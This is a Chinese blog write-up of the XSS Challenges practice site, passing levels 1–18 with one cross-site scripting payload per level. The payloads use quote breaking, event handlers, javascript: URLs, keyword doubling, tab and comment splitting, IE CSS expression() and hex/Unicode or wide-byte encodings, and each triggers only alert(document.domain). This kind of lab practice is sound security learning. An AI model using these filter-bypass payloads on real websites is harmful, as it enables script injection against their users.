xss挑战闯关笔记(二)

最新推荐文章于 2023-06-25 16:28:56 发布
最新推荐文章于 2023-06-25 16:28:56 发布
阅读量487 收藏 2
点赞数 1
分类专栏: CTF 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42111373/article/details/106158239
版权

一、在线靶场

XSS Challenges,https://xss-quiz.int21h.jp/

二、实战

ps:需要注意的是alert里面必须要弹document.domain

level1:无任何过滤,参考payload为:<script>alert(document.domain)</script>
在这里插入图片描述

level2:查看源代码,发现只需要闭合引号即可,参考payload为:"><script>alert(document.domain)</script>
在这里插入图片描述
在这里插入图片描述

level3:查看源代码,发现搜索框并没有传参,在下拉列表框发现p2参数,直接在下拉列表框插入payload,payload为:"><script>alert(document.domain)</script>

在这里插入图片描述
在这里插入图片描述
level4:观察跟上题一样,但是f12看到有一个隐藏输入框,把它改为text可见,然后插入攻击代码,payload为:"><script>alert(document.domain)</script>
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
level5:此题考查前端长度限制,f12查看代码发现有长度限制,直接修改为50以上即可,payload为:"><script>alert(document.domain)</script>
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

level6:此题考查符号转义后的绕过,打开f12发现没有什么可以利用的,然后随便插入一个payload提交,查看源代码,发现<>都被转义了,那么我们可以使用事件进行绕过,payload为:" onmouseover=alert(document.domain) >
在这里插入图片描述
在这里插入图片描述

level7:和level6差不多,payload:" onmouseover=alert(document.domain)
在这里插入图片描述
在这里插入图片描述

level8:伪协议,随便插入一个攻击代码查看源代码,发现都被过滤了,并且下面还出现了url,那么肯定伪协议没跑了,payload为:javascript:alert(document.domain)
在这里插入图片描述
在这里插入图片描述

level9:此题用的utf-7编码,没环境,参考payload为:" onmouseover=alert(document.domain)直接用firebug过的
在这里插入图片描述
level10:此题过滤domain关键字,考虑用双写或者大小写绕过,然而这里只能用双写绕过,参考payload为:"><script>alert(document.dodomainmain)</script>
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
level11:此题考查过滤关键词的绕过,此题吧script换成了scrixxx,onmouserover换成onxxx,可以利用a标签绕过,需要注意的是用tab制表(%09)换行,参考payload为:"><a href=javascri&#09pt:alert(document.domain)>test</a>
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
level12:过滤了<>和"和’,试试编码能不能绕过,发现并不能绕过,百度查看wp发现还有符号可以绕过,但是必须在ie浏览器,没有环境,故用firebug过,参考pyaload为"onmouseover=alert(document.domain)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

level13:不会,百度大佬wp:转义了<>和",F12发现和level12多了一个style属性,那么肯定是style下手了,但是不怎么会,百度一下搜到一个知识点叫“行内样式的动态特性”(就是在ie下能在css中执行js代码),同样只能在ie中复现,参考payload为: aa:expression(onmouseover=function(){alert(document.domain)})或background-color:#f00;background:url("javascript:alert(document.domain);");
在这里插入图片描述
level14:不会,百度大佬wp,这里过滤了expression,url,eval,script,但是通过加入注释符可绕过,参考payload为here:expre/**/ssion(onmouseover=function(){alert(document.domain)})
在这里插入图片描述
level15:转义<>,",也转义了&,过滤了\,这里可以用16进制或者Unicode编码绕过,参考payload为:\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e或\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
level16:和上题一样,只是16进制不能用了,参考payload为:\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e
在这里插入图片描述
level17:不会,百度大佬wp,类似于sql注入的宽字节注入,用%A7(%几都行,只要符合下面大佬WP中可以用来欺骗的编码)加上双引号的%34?让html自解码机制误认为这是宽字节字符,从而弄掉双引号。

level18:不会,百度大佬wp,将每个字符的二进制最高位置为1,然后再转为16进制,故"><script>alert(document.domain)</scirpt> 就转换为%A2%BE%BCscript%BEalert(document.domain);%BC/script%BE 但是前提还是用旧的IE版本IE5,6

三、总结

此靶场12题以后都是一些不常见的xss,需要仔细判断。一些题目需要老板ie才能复现。自己还是太菜,后面都不会。

Deilty
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第一论坛
03-02
第一论坛 ПроектсБДможноскачатьпоhttps://drive.google.com/file/d/1xSncq48XbFGbu0Awtq7BRSh03s1U66Yl/view usp sharing ПостановказадачиРазработатьWeb-cайтфорумсоследующимфункционалом: ●через电子邮件; ●созданиеновойтемынафоруме; ●созданиесообщениявтеме; ●редактированиесвоихсообщений; ●валидациявведенныхданных。 注释●ASP.NET MVC; ●实体框架; ●MS SQL Server; ●引导程序; ●MS Visual Studio。
XSS Challenges xss-quiz.int21h.jp
weixin_30851409的博客
04-19 860
概述: https://xss-quiz.int21h.jp/ Stage #1 payload:<script>alert(document.domain);</script> Stage #2 http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf6...
XSS-challenge(level1-8)过关挑战详解
cc
02-12 5276
xss漏洞我们首先需要选择较为合适的方法进行触发弹窗操作,常见方式无非就三种:利用尖括号,伪协议和HTML事件,其次就是找到闭合点,最后选择合适的语句触发弹窗即可。
[理论-学习]Web安全-XSS-基础13
3hex的博客
08-27 527
声明: 由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。 笔记内容来源于各类网课。 环境: XSS Challenges Stage #10:http://xss-quiz.int21h.jp/, Firefox浏览器,BurpSuite 一、概述 绕过鼓励domain为空的xssXSS探测 1. 正常的数据提交 提交的123abc,出现在input的value属性中。 2. 代码审查 通过代码审计,我们这可以使用标签闭合引入script。 ...
xss challenges闯关详细(6-10)
zsynbw的博客
10-28 573
xss challenges闯关详细
xss闯关挑战
11-09
闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
1ncrd#Study-Record#BUUCTF[第章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
xss game挑战笔记.pdf
最新发布
02-11
xss game挑战笔记
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
04-27
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
漏洞篇(XSS跨站脚本攻击
m0_58001548的博客
04-16 585
页面中存在一个 p3 参数,type 类型为 hidden,闭合方式为双引号,所以 p3 为隐藏参数。我们使用 burpsuite 进行截断数据包进行分析。p3 的值为 hackme 我们直接插入代码这里必须使用">闭合,这样 XSS 代码才会被执行。
xss打靶日志(1-5关)
PISES3_5的博客
06-28 322
xss20题挑战前5关
xss闯关详解
m0_73189964的博客
06-25 990
xss前18关详解
XSS线上靶场---haozi
qq_52016943的博客
07-29 1216
XSS 在线靶场
XSS线上靶场---prompt
qq_52016943的博客
07-30 865
XSS prompt
XSS-labs(1-10)闯关详解
m0_46467017的博客
07-25 2646
通过查看可以知道本关与上一关的不同,在于转换后的内容不同,虽然添加了大小写转换,但是因为转换后,字符被转换为空字符,所以转换后的字符如何仍可以组合成,那么就可以绕过该防御机制。进入第八关后,发现无法构造闭合,采用是采用了htmlspecialchars($str)函数,而且闭合方式是双引号,所以input中无法注入,但是在连接里面是有地方可以注入的。右键查看源代码,发现我们输入的>,.........
靶场通关-XSS挑战之旅(1-5)
m0_56634355的博客
06-04 1360
直接使用在线靶场网址:https://xss.angelo.org.cn本地搭建xss靶场,这个简单百度吧点击图片后,进入下图:我们可以看到用于js弹窗的代码顺利执行了 看看源码,分析一下 接下来去服务器端看看这一关的源码......
XSS Challenges通关教程
众生度尽,方证菩提
02-02 441
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
xss闯关(1-20)
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-10 485
XSS(Cross-Site Scripting)是一种常见的Web攻击技术,攻击者通过注入恶意代码,使得在用户访问受到攻击的网站时执行并影响用户的浏览器。XSS攻击通常被用于盗取用户信息、会话劫持、篡改网站内容等非法目的。
[第章 web进阶]xss闯关 1
04-10
XSS是指跨站脚本攻击。它是一种利用Web应用程序中的漏洞,向用户的浏览器中注入恶意代码的攻击方式。攻击者通过注入恶意代码,可以窃取用户的敏感信息,甚至控制用户的电脑。在Web应用程序中,应该采取安全措施,禁止用户输入可执行的代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值